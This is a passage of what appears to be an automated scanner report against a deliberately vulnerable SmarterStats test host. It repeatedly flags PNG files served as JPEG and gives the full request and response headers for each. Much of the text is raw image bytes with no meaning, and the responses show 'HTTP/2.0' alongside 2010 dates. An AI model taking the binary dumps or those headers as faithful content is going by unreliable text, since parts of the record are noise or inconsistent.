lo..-. .I..T1..w....c..O..&....[r`.6.lR+5U......}..c.. .I....7....l...Vj..E.;]......'@`..]...sX.6.lR+5U......}..c.. .I...........JM..hy...?.........<...t..g....z,V.h._.-..'..`....W..:..!5O?....U..P.......m...yZ...v..|...E.%..+.}_.k...-n..}e<q.-z...?.k.{c?..i..>L`...........\......m..N{.i..<qzg..?....B....A/w.V.^.=......9........q..Ek..Cg....=.>. .-.@.5.^.}$..h..V.Am..hy..?....B...{k7.....#pm.....G.[....+a..m.{...?.........._....9....kp......N...-j..],Z...rD.O.......y............j*.[..    l.<..}_.8......{.}.!.[.....\..My.-. ...P.U,Z.Y....=.>.k`......Q...zs.`.....-. .Ex..s,Z.8.:..>...    X.......u.....OQ.o..w.u..cW..a{c.k....X.L..,Z......=.>.)......?h....7.=O...{.........w...m..z4.D.....H.}..c.......,..@..o.{...9.............9.....>.3...hy...?....B...?K.*..OL8..........}&......Z.A`..1.....w....c..O L`...D.K...o.(......$..Q..c......-.(.5....................4....h'......Dw....y....^.}./>..v.Nl......w....c..O ...-..;;l9..?B..M.....n.qY..D...-. ..h....E.;.......'p?....N.m=^..[.A`..0...X..q>t..}..c....6.8.f.K0..?.H.A`...6kX.......{.}...........(.-..../......Y...c..O..&.....y.-.`.Mj...Y.......{.}............p.5.......l..Nl.......<.}..c.................."=.....3..h....a&r..-.D.....{.@........(....7".....[..    l.{u..c..R..c...P...%y.q......g.r..}.N..1*\.m../.h..6F..8.O..y....=.>.p.....es.....-. .Ex..s,Z.8.:..>...    ..l;....K.....#.-..x.k`......u.....oN...6.J...K0..?y!. ...f.5<qz..?......-...]..%Q..o..u.V.....................r..o...R.....JM.......}..c.. .I....8...Vj..E.;]......'@`..]..[..[.A`.Z..b.-.t.....{...M.w..oy..S.A`.Z..b.-.t.....{...M.'.u...&.RS.,Z......=.>...d.
l..w.....JM..hy...?.....l..-..Q.l...Mj...Y.......{.}..6.....)..h..&.RS.,Z......=.>...dO`..#.Mj...Y.......{.}..6.........h..&.RS.,Z......=.>...d.
l...[.A`.Z..b.-.t.....{...M.w......m...Vj..E.;]......'@`..m.........6...*f..N..>...    ..${W`........JM..hy...?.....l..+.}].l...Mj...Y.......{.}..6.....9....6...*f..N..>...    ..${W`{m.k...Mj...Y.......{.}..6.....G...JM..hy...?.....l..+.}..~(E..6...*f..N..>...    ..${W`........JM..hy...?.....l.=.....6...*f..N..>...    ..${W`..?...m...Vj..E.;]......'@`..    l]p$.I..T1..w....c..O`...<-..4.m.|y~.S./.'.~lb\.....[.A`;.-..>..w....c..O`..m.....Ov.L..<.3....i.......cVl...s`.6.l=.f"wa..N$.>...    L0..cv......m...n.3)........[....}X.......{.}.S.leWm...ie.m?...b..w...I9;;K%..4..x.Q...s`.6.u......;......z........yw.=Z........C?.k......[...[......e....Y...c..O`.;l..Z.1....W...m.."<......q.    l^...N.....).........}..7.1...=.....-...!..h....'N.D.....{.....j......=....r.....861......|.6.l..e:.g...%.>...    L0...I`..#.m.....E......>.>...d.
l..;l...Mj...Y.......{.}..6......]..h..&.RS.,Z......=.>...dO`..#.Mj...Y.......{.}..6.....,..E..6...*f..N..>...    ..${W`...y>E..6...*f..N..>...    ..${.[..    lR+5U......}..c.. .I........m...Vj..E.;]......'@`..]..K~..). .I..T1..w....c..O..&.....H`.Z..b.-.t.....{...M.w../.;l...Mj...Y.......{.}..6.......>.....JM..hy...?.....l.=.....6...*f..N..>...    ..${W`.....m...Vj..E.;]......'@`..m..7s`.6.lR+5U......}..c.. .I.....9.E..6...*f..N..>...    ..${W`{.o<.....JM..hy...?.....l.=.....6...*f..N..>...    ..${W`.....m...Vj..E.;]......'@`..m...s`.6.lR+5U......}..c.. .I...........JM..hy...?.....l.=.....6...*f..N..>...    ..${W`{..=.....JM..hy...?.....l..+.}^.l...Mj...Y.......{.}..6.....G...JM..hy...?.....l..+.}....h..&.RS.,Z......=.>...d.
l...[.A`.Z..b.-.t.....{...M.'.u...&.RS.,Z......=.>...d.
l.....h..&.RS.,Z......=.>...d.
l...[.A`.Z..b.-.t.....{...M.'.u...&.RS.,Z......=.>...d.
l..+..h..&.RS.,Z......=.>...d.
l/..-. .I..T1..w....c..O....8_..l6[.....|....H`..6...E.;.......'@`+i-.g...D....S...
l.....h....a<.5.h..|.,......'@`[.....]...&.....>....v'E.}.....OMQ....%/IQ..k/._>.Ia....'.g.<.]..=...u.......| .8v..x..S.q.....|..aG...z.;Q/.......Z..b..v....>=..E.}.[z..S.QBd..........r]..JX{.....r]}.J`..._.n..:.U..;_u.r.k;.U......p.\W.....y.#.F..c_%..c..p.\W............Z...b......>....,.pv}<.......g`@.....=@...7...O>9hz".]rFIt.Yo.`.......t...<.`..L6X...Q.| .;..6.....*-f.....g.9..(.F..a.k..}..p5..gy...?Ul..cO`[.....p....@....@........q...... ...... .........@....8,@`.;.@....@..........!.... ....6z.....a..|=.s_..........|s.f~...Z.....g.e..=......4z,..|.....9......m...<..{Aa..............s`&.....z}..%..._...UH..O#..._.b....N`.>....v.......|.@y.$...'._./.|..'..7    .....;.id.....;.;.........|...^..G'..o.....'Q.@....z.<..v......(.....f.u.%...e.........l.>~.".....J......Ey?...|.?Q....^._..    i.%Qv..5.....oN.4...r.."...T....}.?.a.2.{.t...w~.g......    ..._.d.._.....D    l.u.g.Z..6.h....un.U.....Z..:v.*......|..z%...a.6#\.].e..zk......ki......o.......;....-.......{..X=.y.@....@..J..[%.e. .... ..X.....9... .... P)@`.......@.....K..6.4.A....@...*..l.p.!.... ...c    .....<. .... .@......2..@....@`,...X......@...... .U.Q.... .....%@`.K.. .... .......J8..@....@.....lcIs...@....@.R..V    G... .... 0....z.....P.....IEND.B`.

10.10. http://vulnerable.smarterstats.6.0.host:9999/Temp/20226bc24c8e4c89926647164054826e.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/20226bc24c8e4c89926647164054826e.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/20226bc24c8e4c89926647164054826e.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=CEO
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:59:29 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682F8851B980"
Content-Type: image/jpeg
Content-Length: 19860
Connection: Close


10.11. http://vulnerable.smarterstats.6.0.host:9999/Temp/26da1ed6256b4e7f89617f968309aea9.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/26da1ed6256b4e7f89617f968309aea9.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/26da1ed6256b4e7f89617f968309aea9.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:32:08 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682BB7662C00"
Content-Type: image/jpeg
Content-Length: 8473
Connection: Close

..0..I..l%..~C.....f|..O.......b.BT...:..+O..I.&Y[    m............8...1."..%!Z....2.....1k+.m..BTd.e.CV....Z..W......~.x...jA'.5r.Jh[........C........dDl~...~.e.......-3.e+.m..BT....{..;{Grfm.c....Qih..#D...O...3...{.Jh[...    ..)....'.3k D|jSF....R)..^%.M.q/[    m..................FFT..^9...Fy|.r.G..VB..7.H.....N.......X.!*....P..........8.....o.....-pN.......#Ya!*    Q.#Bi.y......l.8.....o...gm..p../o@....9.....V.Si's..VB..wO."z.(=.......7:xg.##*gD.    ......._.vQY.l%..~.t!r...~.6..2[#.@.../..V...N)D.l^.........h.'..C.^!.~q7./..=.
idD..h...8..W.....UD...V.{.....Mo^....sM."..%!...P.e...dVD...\...V.M...-L.!...q5..;?D...
.H..hh6...S-.....    ...R.H...~..":.........W....5....NG........
.H... D$...}O,.7A.s!_mm.e..I..e.....O.....H...v.....4r5.;.....*..QLC..z..../.J.<.r...E....D.Mm.;I!.a.-. .y....Kmw.b....v.....#..$.......+...s.Y.b..4G..)..S.................l.;)!.c.....\)f~.'4.i.....Y.....;~+c.bT.'.....".QI..:".vy..G...W*.!k+.m...2.1.N_ q...j1.X..q8......+gus.    ....|......."..K#...=..L.Q..VY.,>:.X...N!"!..nR...f/...D(:.......Z..z....5....of..m...CY."#*    .K...Y(...V...    ,Vd$ld......V.W........{..^'.(.7...../..r.}..\qv.+. D...9B...;.W.....s.    ,N.I.....!...$".,.RL=tK......R..n..4DS..}[.._..sE;...%.....73e.......Y..b.....~7"D..tF9eA...........<DS..........Wl?...fER....
9...$K..U...    ..O(....m....X...4....BD....<...x..........Z.!.
........Ol{..u.D.)/.$..D!......(.v{........]...C%...L..l.;........*1.w?..g.....-..=D..N...c......wY...X .n..Q6.....].LQ.n.T...-..h..G..h....o>..O..{.....-D..m.P..8$.(......b..    b.G...^}.#......G..W.?Glp.......?.^......-.Y"fm.&&m......;...h....V4_B...e. ...z.....].......N.I$...*..h...H.b...Q.=.i.h~{..<l_...x[.7f.u...} ...@[^4...Q..E!"a.p...#

zrAD.Eo..#m...].u:>7..+.:(#...j1t....3.o.V#W8C.......77L.......Q.}..^r...(^h.......1E...AM.J.........w..h.q..y.b.B...*..Qiii..6mB.....1.._......gh.B+.F$.6^..MX.w...-...o..M...OV.;vL?..j..w[..n.....{
.=+Sx|..V.....
..V.T@.-....".!J......................p....n&D.....A.K...7..s..tM>}...F.........Ym.........].aA6...=pob)..X*...k)..7...f...f.w...H.(.=.A..'g.Z........\>/......g.Z.Wp.V....Y.B../..E&.%ojq./..hS..A?,.>..W..?...e<N<......[...U.=..&B..".)....w...W7..~.K.Xp...O.=..,8.....Xw......|J..`..{....7NB....Y
....8.'D.?.Y...    ...:B......o%U......j.JT.J...Qu
.&JY.....~.jV.....X;.!N...nF....8.....&$....R....n..E..o.u...OT..V..J.B.2..D.H.=U2:.G.)2.o.B..vT..kp..g."e(N..D.#o.ds.y....g~+-.{TF.!B.9..Ib.(....h    dD....I.s2Y......fYlGi..;.....e......_.......v....(R....5.~n.z.#J.i..4DK"#.M....U..%=....9.....YjG...    . 2;.r.q...b`].......*...}.).Q......fasJ._.6...?..."...........K.~.....v...ib..c9[2.'..Y.X..y..........I>>..@ ..@...C...... D=...D .u. DY.!...z.......h"..:.........=...Q..d4..d...Q.{..........t2.......(.=...@.@.B..:.M..YG.B....@.. .!....&...#..,#t.Xy......IEND.B`.

10.12. http://vulnerable.smarterstats.6.0.host:9999/Temp/272276131291426282a9ebb0efad2752.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/272276131291426282a9ebb0efad2752.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/272276131291426282a9ebb0efad2752.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; STHashCookie={"CountsGuid":"444009411","TopBarSection":"AdminManage"}; SelectedLanguage=; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Mon, 11 Oct 2010 20:16:25 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB69812D2FDC00"
Content-Type: image/jpeg
Content-Length: 8986
Connection: Close

.PNG

10.13. http://vulnerable.smarterstats.6.0.host:9999/Temp/29bf53d9459f4ad5897ed8fe1e6273c6.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/29bf53d9459f4ad5897ed8fe1e6273c6.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/29bf53d9459f4ad5897ed8fe1e6273c6.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminManage"}; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:33:34 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682BEAA8BB00"
Content-Type: image/jpeg
Content-Length: 8473
Connection: Close

.PNG

10.14. http://vulnerable.smarterstats.6.0.host:9999/Temp/3022c349e42e4a16915d331a96969eb5.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/3022c349e42e4a16915d331a96969eb5.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/3022c349e42e4a16915d331a96969eb5.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=CEO
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:59:27 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682F87B92300"
Content-Type: image/jpeg
Content-Length: 12688
Connection: Close

.PNG
..y.N.......P@b"l.A..6
.z(.a.D?.u{2.    ...z..).....`^..W..............D%\.....
..=...P....=...s`h....}.@as0/..[    ....)#..}....$&....Aa.......J.3Z.'C.p....<....(l...:yE...eM.)....x0 1....
..=...P....=...s`h....}.@as0/..........$*.../..M..^..l{.....r8.{fH~...a....<....(l...:ys...........\.j].."..Xb....'......k.N.g..6..b.."....=.......?..D.~^.]*l../..F
.%T....+.@..g...`...].......)q.....G....:N.O..6.s.... s........J.>.o..E.n..Fh#..!.@ik=F,....l.sD.e0l[.*);}a....p....y.....p......q..z..9....E.(...b.M.......3.@.B..."R0.V..v.cD..{{..>CdX..~k.....-V...U..4}.@as0......+a.h.6eX/....(lHL.....K..(".Cm..ng=....W...>_dX.CY......N.Ra;v2<...(f..#U%n..8M_=P...G
a{f.5mX/...{o.......kut.....#...!R....ct........%.2.v^.....)P
...?..:'...d!.....^.........a......\...!R....cT.o6.(..T.a..;.y..&dxJ..........{.B..(^..^...we.....\...!r[.ik=F ..hJ......`...-........]K/Fh...t..+l...5y.1.B..?.G......./..E%l'N.]*l...).~ ...    .1.i..9e.."2,.a......[zLn.1..tZe.s..........'.W..:n..9)[kgf?.vm.A.....-y....=.a{....HL.._...../~.N..2$.#.@ik=..<....|......k.N.g..
..p...p....re#.8t>\.6il.....n....?-V..a..K.o...PL.._....!..K....V.Z......&.|......k.N.g..
.f...F..eN...XU.....e......?.[......./\......B.]..=.{v.H.....z.].....l..G.e0.^.p.>{(S..*....}K.mQ.........ak{..v....{...r..
Y....M...jl.....(lH.!l.}F..o...i#.C..(m..h.C....A.d;t.P.tBX...|.Nw. .gkV........X'....K.n.d|o>}..J.>.........=;mXW.*...@$...-.....!|......k.N.g.e
..\L.g.....\.}.i.N^Y...'w..z!...t.e(&.....E.....`..X.D.z.].....l..G.e0.^.p.>{(R.D.....G.(.Ya.s.......^......n....?9
.6..r...6.H!l...R0|{..".b...Ht.... ......+..6<.r`h....}.P...T4o..-o"f........8..zheM..X._....D%l...:.T...O.j#....+m.H1F........2..r..a?..........b.m.......<t@5...W..'E..F.......HL........9...F
..E..6..?....6J...[.z.0.....S........w........G.6S....:y+a..(l.H.P......)......6R0D/.H1F.y.....6.UJT*......R....6>........'FY.F......q@.....D.]*l...m.....c....cD.wZ..ja..7...H...P:8.....f.x.7....~..)l.....!1.........M.P.>V..H1F..Y....6.U..G.....;8.....f.x.7....>..=..~..a}..._y..P..6..m
....@$R..y|V.......?.......x0h.z|....C...#..(l....... }.......?RG.
.r..z!.._./.@"..........W...*.V&....;8.....f.x.7.............D%\7.Cut.6....B$..:^..D.1.;>.A................<..a=>..{.!P...............S...>.J./..>(R..r.6..W...H.....^........X..F
...B...98.....f.x.7....>...a.6eX.D........a....RaCN..`..xZ...c.~c_.....]..d.H1..
...._.P..    ....!P.<..66
..o..)..}\.5mX.D...o....a..ut.......H...8>$R....o...e.....?.V...x.gmX.!..P.P.~.S.....xx..~.E
a{I<m.......8>$R..M.^q.(}|..y.m.UJ..FA.$
.J.o{
...I!l...?..H.P.0
....}....K...x.V.)..$....c.~.8....M.x4i.b.....v....~ ^....cD.%
.B.w[
...I!l...M...(..........=ut.......H..=..b..o>.y|.l.!. Y.).X[A.v....z.. .$Q.P.~.S.....xx.'..b"lW.]...Z/D.?zZ9....v...j..,..C..7p..u...../p.F.1"......-.........
.6..P..s>~/..p}2
.2...R.L....J.D.1z........Y*%.<...f...2..    ....C.^..~..(lZr...N^...s...#.B..........QG.a{n..j#.....!.b..o..y|.lx.J..........\..8..........z.C...=....X'......M..............mut.6.
...sc....c.~.......Y*%.<...f..{v.P{A......X2...!....
..Y.N^..5
.6.....3...(*....RG.a{V..j#.C.B)mS...Ar...e.y*H
..#...W3.~.N.Y.Q..>)B.Y.o.%.z..b.....9........EaS...@.....D...:...R.L.....M1F.....W....2...C.R^3<........O..v...b..^.....>(l.f.:ye.~t.5mX.....DaC"..==V.....vlu..c.~Q.......je.....z....#..dZ.yC..c..6..b..9.......D%l.....Ra{j.Jm..!...v)...hC..>.Z6._X...z>m+y.......O.X2...!....
..Y.N^..%V..a}......wC1.........e
....m.1"..+}|....._...f....0....v).........k{
....N.J..k.6eX....'......._SG.aC.R.Gc.T..O...D.y~F...6J._-...........ig=.\N+{>e;..i..1F.}P....u..A.QQ..a}......?.....EaSF.a{|.JmT...ut..*.)..9m[..j.@.............|%..K...7..=.Aas0+.....i.sZ...._UG.!B........z|..R,..i...W..S..km.`.\<d=.Y...-z..K.J~..ri.^.,.>f.....o...=N.....=['.......uX.D..I..v"lE.].......>Y.....6.....-R.,a|].........!r....C......c?.m.;/n+6...=rn...t..e.-.D{
.P.xe#.8t>\....N.=.N]..y.......PaK.Pj..W...0........0.>)B.U..~.:..7...*..*%:>..v.g.....j.6R1t.]O.F...9|*.my..G..u..z2\:|$<\....yl....k..)l...T..U...w{.....(..K....j.=..u....E..U..v"lY.]........../..z|.1~.q!(....Jj..rl....:.1VC......J40.].....Ol[%......>
..}.\.Z.M.k...........6.......a...N.g!l..b..h.........a.K...c...V....1t,.......}.y......!\-.....?6V).Q...}P.......Fmk..A..H......f...6...    ...z.....[o..r.........s`....y..BY'....\L(lF.....@..u7m...z.N.G..D...OZ.!...6.......?&=.]t..n:.......C...~...z2.....OZ.!.V...:...:...(l..1...........    ..    .@..x[....
[.)....    ..    ..    .@..V.,.3..    ..    ..    dM.....q.$@.$@.$@.%....0...$@.$@.$@.Y...e=}%..'...........OJ......1....p?Ev...gyx......?...........Xxsh..M.<6...w{
.....v!0'.?9.n<xc..)S.........B.......{b..3......ve..ps%.a.r..]x.......(l.g...@.....Vl2ew6V..J....k.`..6.b..Q0...+k"m..&.3.........<...y........~...o=;..i=
[.t.~7..V(...S...V.*/+.
~..[...`..    ....pT]    ....6.v.E.....UIQ..oH...e..'..}X....~.)l.x..5.-....)kP..}.._.V..q.......3~.A...D.C....-.i..'.P..."...EC.o!.YaS`d.M...d..6ld.....9...tp0]    ..8.@U..i....nGa..k.....TqlV{../..a..y[.........<q.$@.$@.$@......<...$@.$@.$@.y....1O.%    ..    ..    .@..(l.O>?:    ..    ..    .@..(ly..GI.$@.$@.$P0.
[....N.$@.$@.$...
[...Q..    ..    ..    .L..V......    ..    ..    .A....<q.$@.$@.$@......<...$@.$@.$@.y....1O.%    ..    ..    .@..(l.O>?:    ..    ..    .@..(ly..GI.$@.$@.$P0.
[....N.$@.$@.$.....>...U.a.....IEND.B`.

10.15. http://vulnerable.smarterstats.6.0.host:9999/Temp/3568cde247644a1b9ec6e79fbea220fc.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/3568cde247644a1b9ec6e79fbea220fc.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/3568cde247644a1b9ec6e79fbea220fc.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=CEO
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:59:29 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: "1CB682F87B92300"
Content-Type: image/jpeg
Content-Length: 7526
Connection: Close

.PNG

10.16. http://vulnerable.smarterstats.6.0.host:9999/Temp/356d07443f3445d88a06bf724a953c85.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/356d07443f3445d88a06bf724a953c85.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/356d07443f3445d88a06bf724a953c85.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=Webmaster
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:59:33 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682F8B4CAA00"
Content-Type: image/jpeg
Content-Length: 10168
Connection: Close

.PNG

10.17. http://vulnerable.smarterstats.6.0.host:9999/Temp/3a06471f3515434aa5438ccdb1d520e8.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/3a06471f3515434aa5438ccdb1d520e8.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/3a06471f3515434aa5438ccdb1d520e8.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=Webmaster
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:59:33 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682F8B4CAA00"
Content-Type: image/jpeg
Content-Length: 7526
Connection: Close

.PNG
l.....h.w`{.+S
6.l.=...y.....h..............]..U....j:.[..{..w..R..7.=......cO....e).8v.....>!.8v.....L......G....c.^........../S.:.]{......v......g_..+../.l..o;..
l..w......]..R.qJ`{...N.F    ...JX{.....r]}.J`..._.n..:.U..._}.r.k;.U......p.\W.....y.#.F..c_%..m.o.F..>_%...W.    7.u..E`.......,.pv}<.......g`@.....=@...7...O>9h>$.m8..$:..7|0..f.\.^:..r.|0.O&.....(O>....=......<-f.....g.9..(.F..a.k..}..p5..gy...?Ul..cO`[    ....p....@....@........q...... ...... .........@....8,@`.;.@....@..........!.... ....6z.....a..|=.s_..........|s.f~...Z..r....2.._c
..a..?.|y..~l.........6V.r.j........o.R}R
..V.90.....k.~..%..._...UH^.O#..._.b....N`.>....v.......|.@y.$...'.o...?....p..........4..].........Z    m]`S>..v.w.....7.......r j.
\=a..y.}........r..Yv.xIt.v..,..?..K..t.?...FlCN%
.m.......n@...(.a{.........(;n.......oN.4...r.."...T....}.?.a.2.{.t...w~.g......    ..._.d.._.....D    l.u.g.Z..6.h....un.U.....Z..:v.*......|..z%...a.6#\.].e..zk......ki......o.......;....-......k{..X=.y.@....@..J..[%.e. .... ..X.....9... .... P)@`.......@.....K..6.4.A....@...*..l.p.!.... ...c    .....<. .... .@......2..@....@`,...X......@...... .U.Q.... .....%@`.K.. .... .......J8..@....@.....lcIs...@....@.R..V    G... .... 0....[.i."_......IEND.B`.

10.18. http://vulnerable.smarterstats.6.0.host:9999/Temp/3a8d8b9425a049fd9040fcd161eeba53.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/3a8d8b9425a049fd9040fcd161eeba53.jpg

Issue detail

The response contains the following Content-type statement: Content-Type: image/jpeg. The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/3a8d8b9425a049fd9040fcd161eeba53.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
